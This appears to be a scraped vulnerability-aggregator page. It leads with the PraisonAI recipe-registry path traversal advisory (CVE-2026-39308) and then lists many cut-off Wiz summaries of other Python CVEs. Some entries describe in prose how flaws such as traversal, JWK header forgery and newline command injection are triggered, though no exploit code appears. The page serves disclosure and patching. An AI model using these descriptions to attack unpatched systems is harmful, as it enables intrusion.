CVE-2026-39308
published 2026-04-07CVE-2026-39308: PraisonAI is a multi-agent teams system. Prior to 1.5.113, PraisonAI's recipe registry publish endpoint writes uploaded recipe bundles to a filesystem path…
PriorityP346high7.1CVSS 3.1
AVNACLPRLUINSUCNIHAL
EPSS
0.33%
25.2th percentile
PraisonAI is a multi-agent teams system. Prior to 1.5.113, PraisonAI's recipe registry publish endpoint writes uploaded recipe bundles to a filesystem path derived from the bundle's internal manifest.json before it verifies that the manifest name and version match the HTTP route. A malicious publisher can place ../ traversal sequences in the bundle manifest and cause the registry server to create files outside the configured registry root even though the request is ultimately rejected with HTTP 400. This is an arbitrary file write / path traversal issue on the registry host. It affects deployments that expose the recipe registry publish flow. If the registry is intentionally run without a token, any network client that can reach the service can trigger it. If a token is configured, any user with publish access can still exploit it. This vulnerability is fixed in 1.5.113.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mervinpraison | praisonai | < 4.5.113 | 4.5.113 |
| mervinpraison | praisonai | >= 0 < 4.5.113 | 4.5.113 |
| praison | praisonai | <= 4.5.112 | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
PraisonAI recipe registry publish path traversal allows out-of-root file write
osv·2026-04-06
CVE-2026-39308 [HIGH] PraisonAI recipe registry publish path traversal allows out-of-root file write
PraisonAI recipe registry publish path traversal allows out-of-root file write
### Summary
PraisonAI's recipe registry publish endpoint writes uploaded recipe bundles to a filesystem path derived from the bundle's internal `manifest.json` before it verifies that the manifest `name` and `version` match the HTTP route. A malicious publisher can place `../` traversal sequences in the bundle manifest and cause the registry server to create files outside the configured registry root even though the request is ultimately rejected with HTTP `400`.
This is an arbitrary file write / path traversal issue on the registry host. It affects deployments that expose the recipe registry publish flow. If the registry is intentionally run without a token, any network client that can reach the service can
GHSA
PraisonAI recipe registry publish path traversal allows out-of-root file write
ghsa·2026-04-06
CVE-2026-39308 [HIGH] CWE-22 PraisonAI recipe registry publish path traversal allows out-of-root file write
PraisonAI recipe registry publish path traversal allows out-of-root file write
### Summary
PraisonAI's recipe registry publish endpoint writes uploaded recipe bundles to a filesystem path derived from the bundle's internal `manifest.json` before it verifies that the manifest `name` and `version` match the HTTP route. A malicious publisher can place `../` traversal sequences in the bundle manifest and cause the registry server to create files outside the configured registry root even though the request is ultimately rejected with HTTP `400`.
This is an arbitrary file write / path traversal issue on the registry host. It affects deployments that expose the recipe registry publish flow. If the registry is intentionally run without a token, any network client that can reach the service can
No detection rules found.
No public exploits indexed.
Wiz
CVE-2026-27448 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 1.7
CVE-2026-27448 [LOW] CVE-2026-27448 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27448 :
Python vulnerability analysis and mitigation
set_tlsext_servername_callback
Source : NVD
## 1.7
Score
Published March 18, 2026
Severity LOW
CNA Score 1.7
Affected Technologies
Python
CBL Mariner
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
gitlab-cng-18.9
gitlab-cng-fips-18.8
Sources
NVD
CBL-Mariner 3.0 Severity LOW Has Fix Added at: Mar 29, 2026
Chainguard Has Fix Added at: Mar 18, 2026
Container-Optimized OS Severity MEDIUM Has Fix Added at: Apr 05, 2026
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Mar 19, 2026
Debian 14 Severity MEDIUM Has Fix Added at: Mar 19, 2026
Ech
Wiz
CVE-2026-22690 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.7
CVE-2026-22690 [LOW] CVE-2026-22690 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22690 :
Python vulnerability analysis and mitigation
pypdf is a free and open-source pure-python PDF library. Prior to version 6.6.0, pypdf has possible long runtimes for missing /Root object with large /Size values. An attacker who uses this vulnerability can craft a PDF which leads to possibly long runtimes for actually invalid files. This can be achieved by omitting the /Root entry in the trailer, while using a rather large /Size value. Only the non-strict reading mode is affected. This issue has been patched in version 6.6.0.
Source : NVD
## 2.7
Score
Published January 10, 2026
Severity LOW
CNA Score 2.7
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability
Wiz
CVE-2026-32727 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-32727 [HIGH] CVE-2026-32727 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32727 :
Python vulnerability analysis and mitigation
SciTokens is a reference library for generating and using SciTokens. Prior to version 1.9.7, the Enforcer is vulnerable to a path traversal attack where an attacker can use dot-dot (..) in the scope claim of a token to escape the intended directory restriction. This occurs because the library normalizes both the authorized path (from the token) and the requested path (from the application) before comparing them using startswith. This issue has been patched in version 1.9.7.
Source : NVD
## 6.5
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 8.1
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentil
Wiz
CVE-2026-25048 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-25048 [HIGH] CVE-2026-25048 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25048 :
Python vulnerability analysis and mitigation
xgrammar is an open-source library for efficient, flexible, and portable structured generation. Prior to version 0.1.32, the multi-level nested syntax caused a segmentation fault (core dumped). This issue has been patched in version 0.1.32.
Source : NVD
## 8.7
Score
Published March 5, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Python
Chainguard
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.8
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
py3-vllm-cuda-12.4
xgrammar
Sources
NVD
Chainguard Has Fix Added at: Mar 17, 2026
pip Severity HIGH Has Fix Added at: Mar 08, 2026
## Get
Wiz
CVE-2026-5463 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
CVE-2026-5463 [CRITICAL] CVE-2026-5463 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-5463 :
Python vulnerability analysis and mitigation
Command injection vulnerability in console.run_module_with_output() in pymetasploit3 through version 1.0.6 allows attackers to inject newline characters into module options such as RHOSTS. This breaks the intended command structure and causes the Metasploit console to execute additional unintended commands, potentially leading to arbitrary command execution and manipulation of Metasploit sessions.
Source : NVD
## 9.3
Score
Published April 3, 2026
Severity CRITICAL
CNA Score 9.3
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 77.7
Exploitation Probability (EPSS) 1.1
Affected packages and libra
Wiz
CVE-2026-24490 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-24490 [HIGH] CVE-2026-24490 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24490 :
Python vulnerability analysis and mitigation
android:host
Source : NVD
## 4.8
Score
Published January 27, 2026
Severity MEDIUM
CNA Score 8.1
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mobsf
Sources
NVD
pip Severity HIGH Has Fix Added at: Jan 27, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
CVE-2026-35615
CRITICAL
9.2
Wiz
CVE-2026-23892 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.0
CVE-2026-23892 [MEDIUM] CVE-2026-23892 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23892 :
Python vulnerability analysis and mitigation
OctoPrint provides a web interface for controlling consumer 3D printers. OctoPrint versions up to and including 1.11.5 are affected by a (theoretical) timing attack vulnerability that allows API key extraction over the network. Due to using character based comparison that short-circuits on the first mismatched character during API key validation, rather than a cryptographical method with static runtime regardless of the point of mismatch, an attacker with network based access to an affected OctoPrint could extract API keys valid on the instance by measuring the response times of the denied access responses and guess an API key character by character. The vulnerability is patched in version 1.11.6. The likelihood of this att
Wiz
GHSA-f2mf-q878-gh58 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-f2mf-q878-gh58 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-f2mf-q878-gh58 :
Python vulnerability analysis and mitigation
Affected Product: Parsl (Python Parallel Scripting Library) Component: parsl.monitoring.visualization Vulnerability Type: SQL Injection (CWE-89) Severity: High (CVSS Rating Recommended: 7.5 - 8.6) URL: https://github.com/Parsl/parsl/blob/master/parsl/monitoring/visualization/views.py Summary A SQL Injection vulnerability exists in the parsl-visualize component of the Parsl library. The application constructs SQL queries using unsafe string formatting (Python % operator) with user-supplied input (workflow_id) directly from URL routes. This allows an unauthenticated attacker with access to the visualization dashboard to inject arbitrary SQL commands, potentially leading to data exfiltration or denial of service against t
Wiz
CVE-2026-34591 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-34591 [HIGH] CVE-2026-34591 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34591 :
Python vulnerability analysis and mitigation
Poetry is a dependency manager for Python. From version 1.4.0 to before version 2.3.3, a crafted wheel can contain ../ paths that Poetry writes to disk without containment checks, allowing arbitrary file write with the privileges of the Poetry process. It is reachable from untrusted package artifacts during normal install flows. (Normally, installing a malicious wheel is not sufficient for execution of malicious code. Malicious code will only be executed after installation if the malicious package is imported or invoked by the user.). This issue has been patched in version 2.3.3.
Source : NVD
## 7.1
Score
Published April 2, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Python
MinimOS
Has Public Exploit
Wiz
CVE-2025-70560 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.4
CVE-2025-70560 [HIGH] CVE-2025-70560 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-70560 :
Python vulnerability analysis and mitigation
Boltz 2.0.0 contains an insecure deserialization vulnerability in its molecule loading functionality. The application uses Python pickle to deserialize molecule data files without validation. An attacker with the ability to place a malicious pickle file in a directory processed by boltz can achieve arbitrary code execution when the file is loaded.
Source : NVD
## 8.4
Score
Published February 3, 2026
Severity HIGH
CNA Score 8.4
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 20.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
boltz
Sources
NVD
pip Severity HIGH No Fix
Wiz
CVE-2026-25733 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.3
CVE-2026-25733 [HIGH] CVE-2026-25733 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25733 :
Python vulnerability analysis and mitigation
Rucio is a software framework that provides functionality to organize, manage, and access large volumes of scientific data using customizable policies. Versions prior to 35.8.3, 38.5.4, and 39.3.1 have a stored Cross-Site Scripting (XSS) vulnerability in the Custom Rules function of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the WebUI without proper output encoding. This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions. Versions 35.8.3, 38.5.4, and 39.3.1 fix the issue.
Source : NVD
## 5.4
Score
Published February 25, 2026
Severity MEDIUM
CNA Score 7.3
Wiz
CVE-2025-67485 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-67485 [MEDIUM] CVE-2025-67485 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67485 :
Python vulnerability analysis and mitigation
mad-proxy is a Python-based HTTP/HTTPS proxy server for detection and blocking of malicious web activity using custom security policies. Versions 0.3 and below allow attackers to bypass HTTP/HTTPS traffic interception rules, potentially exposing sensitive traffic. This issue does not have a fix at the time of publication.
Source : NVD
## 5.3
Score
Published December 10, 2025
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 22.8
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
mad-proxy
Sources
NVD
pip Severity MEDIUM No Fix Added at: Dec 09
Wiz
CVE-2026-26209 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-26209 [HIGH] CVE-2026-26209 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26209 :
Python vulnerability analysis and mitigation
_cbor2
Py_EnterRecursiveCall
RecursionError
0x81
cbor2.loads()
RecursionError
RecursionError
Source : NVD
## 7.5
Score
Published March 23, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Chainguard
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
vllm-openai-cuda-12.9
cbor2
Sources
NVD
Chainguard Has Fix Added at: Mar 29, 2026
Debian 11, 12, 13 Severity HIGH No Fix Added at: Mar 29, 2026
Debian 14 Severity HIGH Has Fix Added at: Mar 29, 2026
Echo Severity HIGH No Fix Added at: Mar 29, 2026
pip Severity HIGH Has Fix Add
Wiz
CVE-2025-14009 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 10.0
CVE-2025-14009 [CRITICAL] CVE-2025-14009 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14009 :
Python vulnerability analysis and mitigation
A critical vulnerability exists in the NLTK downloader component of nltk/nltk, affecting all versions. The _unzip_iter function in nltk/downloader.py uses zipfile.extractall() without performing path validation or security checks. This allows attackers to craft malicious zip packages that, when downloaded and extracted by NLTK, can execute arbitrary code. The vulnerability arises because NLTK assumes all downloaded packages are trusted and extracts them without validation. If a malicious package contains Python files, such as init .py, these files are executed automatically upon import, leading to remote code execution. This issue can result in full system compromise, including file system access, network access, and potent
Wiz
CVE-2026-1260 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.5
CVE-2026-1260 [HIGH] CVE-2026-1260 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1260 :
Python vulnerability analysis and mitigation
Invalid memory access in Sentencepiece versions less than 0.2.1 when using a vulnerable model file, which is not created in the normal training procedure.
Source : NVD
## 8.5
Score
Published January 22, 2026
Severity HIGH
CNA Score 8.5
Affected Technologies
Python
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
sentencepiece
text-generation-inference
Sources
NVD
Chainguard Has Fix Added at: Feb 18, 2026
pip Severity HIGH Has Fix Added at: Jan 23, 2026
Homebrew Severity HIGH Has Fix Added at: Feb 02, 2026
Nix Severity HIGH Has Fix Added
Wiz
CVE-2026-27962 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-27962 [CRITICAL] CVE-2026-27962 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27962 :
Python vulnerability analysis and mitigation
Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a JWK Header Injection vulnerability in authlib's JWS implementation allows an unauthenticated attacker to forge arbitrary JWT tokens that pass signature verification. When key=None is passed to any JWS deserialization function, the library extracts and uses the cryptographic key embedded in the attacker-controlled JWT jwk header field. An attacker can sign a token with their own private key, embed the matching public key in the header, and have the server accept the forged token as cryptographically valid — bypassing authentication and authorization entirely. This issue has been patched in version 1.6.9.
Source : NVD
## 9.
Wiz
CVE-2026-27602 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2026-27602 [HIGH] CVE-2026-27602 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27602 :
Python vulnerability analysis and mitigation
exec_cmd()
modoboa/lib/sysutils.py
shell=True
Source : NVD
## 7.2
Score
Published March 25, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 20.2
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
modoboa
Sources
NVD
pip Severity HIGH Has Fix Added at: Mar 26, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published dat
Wiz
CVE-2026-23946 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-23946 [CRITICAL] CVE-2026-23946 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23946 :
Python vulnerability analysis and mitigation
Tendenci is an open source content management system built for non-profits, associations and cause-based sites. Versions 15.3.11 and below include a critical deserialization vulnerability in the Helpdesk module (which is not enabled by default). This vulnerability allows Remote Code Execution (RCE) by an authenticated user with staff security level due to using Python's pickle module in helpdesk /reports/. The original CVE-2020-14942 was incompletely patched. While ticket_list() was fixed to use safe JSON deserialization, the run_report() function still uses unsafe pickle.loads(). The impact is limited to the permissions of the user running the application, typically www-data, which generally lacks write (except for upload
Wiz
CVE-2025-34469 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2025-34469 [MEDIUM] CVE-2025-34469 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-34469 :
Python vulnerability analysis and mitigation
Cowrie versions prior to 2.9.0 contain a server-side request forgery (SSRF) vulnerability in the emulated shell implementation of wget and curl. In the default emulated shell configuration, these command emulations perform real outbound HTTP requests to attacker-supplied destinations. Because no outbound request rate limiting was enforced, unauthenticated remote attackers could repeatedly invoke these commands to generate unbounded HTTP traffic toward arbitrary third-party targets, allowing the Cowrie honeypot to be abused as a denial-of-service amplification node and masking the attacker’s true source address behind the honeypot’s IP.
Source : NVD
## 6.9
Score
Published December 31, 2025
Severity MEDIUM
CNA Score 6
Wiz
CVE-2026-32634 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-32634 [HIGH] CVE-2026-32634 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32634 :
Python vulnerability analysis and mitigation
[passwords] default
Source : NVD
## 8.1
Score
Published March 18, 2026
Severity HIGH
CNA Score 8.1
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
glances
Sources
NVD
Debian 12, 13 Severity MEDIUM No Fix Added at: Mar 19, 2026
Debian 14 Severity HIGH Has Fix Added at: Mar 19, 2026
Echo Severity HIGH No Fix Added at: Mar 19, 2026
pip Severity HIGH Has Fix Added at: Mar 17, 2026
Homebrew Severity HIGH Has Fix Added at: Mar 20, 2026
Nix Severity HIGH Has Fix Added at: Mar 20, 2026
## Get a CVE risk assess
Wiz
CVE-2026-28518 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.4
CVE-2026-28518 [HIGH] CVE-2026-28518 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28518 :
Python vulnerability analysis and mitigation
OpenViking versions 0.2.1 and prior, fixed in commit 46b3e76, contain a path traversal vulnerability in the .ovpack import handling that allows attackers to write files outside the intended import directory. Attackers can craft malicious ZIP archives with traversal sequences, absolute paths, or drive prefixes in member names to overwrite or create arbitrary files with the importing process privileges.
Source : NVD
## 8.4
Score
Published March 3, 2026
Severity HIGH
CNA Score 8.4
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.4
Exploitation Probability (EPSS) N/A
Affected packages and libra
Wiz
CVE-2026-25211 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.2
CVE-2026-25211 [LOW] CVE-2026-25211 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25211 :
Python vulnerability analysis and mitigation
Llama Stack (aka llama-stack) before 0.4.0rc3 does not censor the pgvector password in the initialization log.
Source : NVD
## 3.2
Score
Published January 30, 2026
Severity LOW
CNA Score 3.2
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
llama-stack
Sources
NVD
pip Severity LOW Has Fix Added at: Jan 31, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Tech
Wiz
GHSA-h3m5-p59h-x88p Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-h3m5-p59h-x88p Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-h3m5-p59h-x88p :
Python vulnerability analysis and mitigation
## Summary
--password
-p
openssl_encrypt/modules/crypt_cli_subparser.py
ps aux
/proc/[pid]/cmdline
## Affected Code
subparser.add_argument(
"--password", "-p",
help="Password (will prompt if not provided, or use CRYPT_PASSWORD environment variable)",
)
--keystore-password
## Impact
CRYPT_PASSWORD
/proc/[pid]/environ
## Recommended Fix
Document the security implications prominently
Recommend interactive prompting (already supported) as the secure default
--password-fd
Consider marking the argument as deprecated in favor of interactive prompting
## Fix
e78a366
releases/1.4.x
Source : NVD
## 6.6
Score
Published March 31, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Python
Wiz
CVE-2026-22871 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-22871 [HIGH] CVE-2026-22871 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22871 :
Python vulnerability analysis and mitigation
GuardDog is a CLI tool to identify malicious PyPI packages. Prior to 2.7.1, there is a path traversal vulnerability exists in GuardDog's safe_extract() function that allows malicious PyPI packages to write arbitrary files outside the intended extraction directory, leading to Arbitrary File Overwrite and Remote Code Execution on systems running GuardDog. This vulnerability is fixed in 2.7.1.
Source : NVD
## 8.7
Score
Published January 13, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 71
Exploitation Probability (EPSS) 0.7
Affected packages and libraries
gua
Wiz
CVE-2026-28500 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-28500 [HIGH] CVE-2026-28500 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28500 :
Python vulnerability analysis and mitigation
Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. In versions up to and including 1.20.1, a security control bypass exists in onnx.hub.load() due to improper logic in the repository trust verification mechanism. While the function is designed to warn users when loading models from non-official sources, the use of the silent=True parameter completely suppresses all security warnings and confirmation prompts. This vulnerability transforms a standard model-loading function into a vector for Zero-Interaction Supply-Chain Attacks. When chained with file-system vulnerabilities, an attacker can silently exfiltrate sensitive files (SSH keys, cloud credentials) from the victim's machine t
Wiz
GHSA-gpx9-96j6-pp87 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-gpx9-96j6-pp87 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-gpx9-96j6-pp87 :
Python vulnerability analysis and mitigation
## Summary
This vulnerability allows a user to escape the container network isolation and access the host’s local services (127.0.0.1 bound on the host).
The vulnerability is applicable only on the MacOS and Windows environments while using Docker Desktop, Containerd on Lima VM, or Podman.
## Details
TaskWeaver is a code-first agent framework for seamlessly planning and executing data analytics tasks. This innovative framework interprets user requests through code snippets and efficiently coordinates a variety of plugins in the form of functions to execute data analytics tasks in a stateful manner.
TaskWeaver agents execute code as part of their tasks in a secure manner inside the code interpreter that implements
Wiz
CVE-2026-32111 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-32111 [MEDIUM] CVE-2026-32111 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32111 :
Python vulnerability analysis and mitigation
ha-mcp is a Home Assistant MCP Server. Prior to 7.0.0, the ha-mcp OAuth consent form (beta feature) accepts a user-supplied ha_url and makes a server-side HTTP request to {ha_url}/api/config with no URL validation. An unauthenticated attacker can submit arbitrary URLs to perform internal network reconnaissance via an error oracle. Two additional code paths in OAuth tool calls (REST and WebSocket) are affected by the same primitive. The primary deployment method (private URL with pre-configured HOMEASSISTANT_TOKEN) is not affected. This vulnerability is fixed in 7.0.0.
Source : NVD
## 5.3
Score
Published March 11, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV E
Wiz
CVE-2026-33752 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-33752 [HIGH] CVE-2026-33752 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33752 :
Python vulnerability analysis and mitigation
curl_cffi is the a Python binding for curl. Prior to 0.15.0, curl_cffi does not restrict requests to internal IP ranges, and follows redirects automatically via the underlying libcurl. Because of this, an attacker-controlled URL can redirect requests to internal services such as cloud metadata endpoints. In addition, curl_cffi’s TLS impersonation feature can make these requests appear as legitimate browser traffic, which may bypass certain network controls. This vulnerability is fixed in 0.15.0.
Source : NVD
## 8.6
Score
Published April 6, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Pro
Wiz
CVE-2026-28786 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2026-28786 [MEDIUM] CVE-2026-28786 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28786 :
Python vulnerability analysis and mitigation
FileNotFoundError
DATA_DIR
Source : NVD
## 4.3
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
Python
Open WebUI
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cpe:2.3:a:openwebui:open_webui
open-webui
Sources
pip Severity MEDIUM Has Fix Added at: Mar 29, 2026
Linux Severity MEDIUM Has Fix Added at: Mar 29, 2026
Windows Severity MEDIUM Has Fix Added at: Mar 29, 2026
Linux Severity MEDIUM Has Fix Added at: Apr 02, 2026
Windows Severity MEDIUM Has Fix Added at: Apr 02, 2026
## Get a CVE risk assessment
Wiz
CVE-2026-21872 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-21872 [MEDIUM] CVE-2026-21872 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21872 :
Python vulnerability analysis and mitigation
NiceGUI is a Python-based UI framework. From versions 2.22.0 to 3.4.1, an unsafe implementation in the click event listener used by ui.sub_pages, combined with attacker-controlled link rendering on the page, causes XSS when the user actively clicks on the link. This issue has been patched in version 3.5.0.
Source : NVD
## 6.1
Score
Published January 8, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
nicegui
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Jan 11, 2026
## Get a CVE
Wiz
CVE-2025-11157 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2025-11157 [HIGH] CVE-2025-11157 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-11157 :
Python vulnerability analysis and mitigation
feast/sdk/python/feast/infra/compute_engines/kubernetes/main.py
yaml.load(..., Loader=yaml.Loader)
/var/feast/feature_store.yaml
/var/feast/materialization_config.yaml
Source : NVD
## 7.8
Score
Published January 1, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 50.4
Exploitation Probability (EPSS) 0.3
Affected packages and libraries
feast
Sources
NVD
pip Severity HIGH Has Fix Added at: Jan 02, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related
Wiz
CVE-2025-68142 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.7
CVE-2025-68142 [LOW] CVE-2025-68142 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68142 :
Python vulnerability analysis and mitigation
Python-Markdown
